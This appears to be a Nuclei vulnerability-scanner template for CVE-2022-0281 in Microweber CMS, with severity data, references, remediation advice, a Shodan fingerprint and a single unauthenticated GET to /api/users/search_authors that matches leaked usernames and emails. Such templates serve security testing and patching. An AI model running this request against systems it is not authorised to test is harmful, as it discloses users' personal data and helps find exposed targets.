49 lines
1.6 KiB
YAML
49 lines
1.6 KiB
YAML
id: CVE-2022-0281
|
|
|
|
info:
|
|
name: Microweber Information Disclosure
|
|
author: pikpikcu
|
|
severity: high
|
|
description: Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11.
|
|
remediation: |
|
|
Apply the latest security patch or update provided by the Microweber CMS vendor to fix the information disclosure vulnerability (CVE-2022-0281).
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0281
|
|
- https://github.com/microweber/microweber/commit/e680e134a4215c979bfd2eaf58336be34c8fc6e6
|
|
- https://huntr.dev/bounties/315f5ac6-1b5e-4444-ad8f-802371da3505
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-0281
|
|
cwe-id: CWE-200
|
|
epss-score: 0.0051
|
|
epss-percentile: 0.73916
|
|
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: microweber
|
|
product: microweber
|
|
shodan-query: http.favicon.hash:780351152
|
|
tags: cve,cve2022,microweber,disclosure,huntr
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/api/users/search_authors"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"username":'
|
|
- '"email":'
|
|
- '"display_name":'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100f845f3fa35e9c123f7171af88e1ef88c0e54e3551f718a10a083037e1a76b1fc022100fccaf39fa8388ed44f38474444211e5a8c86c744135a880b9e890b6d591f825b:922c64590222798bb761d5b6d8e72950
|